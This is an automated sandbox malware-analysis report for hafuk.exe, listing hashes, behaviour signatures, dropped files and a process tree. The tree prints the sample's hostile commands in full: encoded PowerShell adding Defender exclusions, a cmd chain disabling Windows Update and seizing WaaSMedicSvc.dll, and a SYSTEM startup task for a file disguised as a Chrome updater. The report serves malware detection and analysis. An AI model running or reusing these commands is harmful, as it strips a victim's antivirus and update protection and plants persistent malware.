Overview

overview

10

Static

static

hafuk.exe

windows7-x64

10

hafuk.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    33s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-08-2022 03:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    hafuk.exe

  • Size

    4.3MB

  • MD5

    e0ec197ba6e02af435a5230b8f4331b3

  • SHA1

    7aada797f2a5f1ff58467923f47d6d31db33fc1a

  • SHA256

    f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

  • SHA512

    46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

  • SSDEEP

    98304:wEH7zDMeBfte//fxvbNOKAJmFxPVGp3X/G3DvJFvxzG99K:wEPDDBfKxvQKAJmFxPVG1/GlFv0XK

Score
10/10
discoveryevasionexploit

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
    evasion
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Stops running service(s) 3 TTPs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 51 IoCs
  • Modifies registry key 1 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\hafuk.exe
    "C:\Users\Admin\AppData\Local\Temp\hafuk.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1180
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:3060
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:3144
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:804
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:3488
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:3796
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:4760
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:3412
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:1680
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:3672
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:4520
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1724
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4612
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:2000
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1240
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:4772
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1052
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:2208
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:1400
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:1444
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:1492
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:2104
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:2024
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:4448
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1940
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2660
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1264
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1676
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4860
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAegAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgBjAGgAcgAuAGUAeABlACIAJwApACAAPAAjAGgAdAB5AHYAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBzAGEAeAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAawAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAEcATgBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxACMAPgA7AA=="
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4588
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2044
                    • C:\Windows\system32\schtasks.exe
                      schtasks /run /tn "GoogleUpdateTaskMachineGNC"
                      3⤵
                        PID:1992
                  • C:\Program Files\Google\Chrome\updaterchr.exe
                    "C:\Program Files\Google\Chrome\updaterchr.exe"
                    1⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of WriteProcessMemory
                    PID:4496
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
                      2⤵
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3176

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Program Files\Google\Chrome\updaterchr.exe
                    Filesize

                    4.3MB

                    MD5

                    e0ec197ba6e02af435a5230b8f4331b3

                    SHA1

                    7aada797f2a5f1ff58467923f47d6d31db33fc1a

                    SHA256

                    f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

                    SHA512

                    46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

                    Download Submit

                  • C:\Program Files\Google\Chrome\updaterchr.exe
                    Filesize

                    4.3MB

                    MD5

                    e0ec197ba6e02af435a5230b8f4331b3

                    SHA1

                    7aada797f2a5f1ff58467923f47d6d31db33fc1a

                    SHA256

                    f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

                    SHA512

                    46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                    Filesize

                    2KB

                    MD5

                    d85ba6ff808d9e5444a4b369f5bc2730

                    SHA1

                    31aa9d96590fff6981b315e0b391b575e4c0804a

                    SHA256

                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                    SHA512

                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    944B

                    MD5

                    6d42b6da621e8df5674e26b799c8e2aa

                    SHA1

                    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                    SHA256

                    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                    SHA512

                    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                    Download Submit

                  • memory/804-148-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1052-173-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1180-137-0x00007FFD0FAC0000-0x00007FFD10581000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/1180-135-0x000001EEDF390000-0x000001EEDF3B2000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/1180-134-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1180-136-0x00007FFD0FAC0000-0x00007FFD10581000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/1240-171-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1264-145-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1400-175-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1444-176-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1492-177-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1676-147-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1680-156-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1724-159-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1812-139-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1940-140-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1992-164-0x0000000000000000-mapping.dmp

                    Download

                  • memory/2000-170-0x0000000000000000-mapping.dmp

                    Download

                  • memory/2024-180-0x0000000000000000-mapping.dmp

                    Download

                  • memory/2044-162-0x0000000000000000-mapping.dmp

                    Download

                  • memory/2104-179-0x0000000000000000-mapping.dmp

                    Download

                  • memory/2208-174-0x0000000000000000-mapping.dmp

                    Download

                  • memory/2660-142-0x0000000000000000-mapping.dmp

                    Download

                  • memory/3060-141-0x0000000000000000-mapping.dmp

                    Download

                  • memory/3144-144-0x0000000000000000-mapping.dmp

                    Download

                  • memory/3176-167-0x0000000000000000-mapping.dmp

                    Download

                  • memory/3176-183-0x0000020774420000-0x000002077443C000-memory.dmp

                    Filesize

                    112KB

                    Download

                  • memory/3176-184-0x0000020774400000-0x000002077440A000-memory.dmp

                    Filesize

                    40KB

                    Download

                  • memory/3176-181-0x00000207742B0000-0x00000207742BA000-memory.dmp

                    Filesize

                    40KB

                    Download

                  • memory/3176-169-0x00007FFD0FF70000-0x00007FFD10A31000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/3176-178-0x00000207741D0000-0x00000207741EC000-memory.dmp

                    Filesize

                    112KB

                    Download

                  • memory/3412-154-0x0000000000000000-mapping.dmp

                    Download

                  • memory/3448-163-0x00007FFD0FAC0000-0x00007FFD10581000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/3448-138-0x00007FFD0FAC0000-0x00007FFD10581000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/3448-133-0x00007FFD0FAC0000-0x00007FFD10581000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/3448-132-0x0000000000680000-0x0000000000ACA000-memory.dmp

                    Filesize

                    4.3MB

                    Download

                  • memory/3488-151-0x0000000000000000-mapping.dmp

                    Download

                  • memory/3672-157-0x0000000000000000-mapping.dmp

                    Download

                  • memory/3796-152-0x0000000000000000-mapping.dmp

                    Download

                  • memory/4448-182-0x0000000000000000-mapping.dmp

                    Download

                  • memory/4496-168-0x00007FFD0FF70000-0x00007FFD10A31000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/4520-158-0x0000000000000000-mapping.dmp

                    Download

                  • memory/4588-143-0x0000000000000000-mapping.dmp

                    Download

                  • memory/4588-161-0x00007FFD0FAC0000-0x00007FFD10581000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/4588-155-0x00007FFD0FAC0000-0x00007FFD10581000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/4612-160-0x0000000000000000-mapping.dmp

                    Download

                  • memory/4760-153-0x0000000000000000-mapping.dmp

                    Download

                  • memory/4772-172-0x0000000000000000-mapping.dmp

                    Download

                  • memory/4860-149-0x0000000000000000-mapping.dmp

                    Download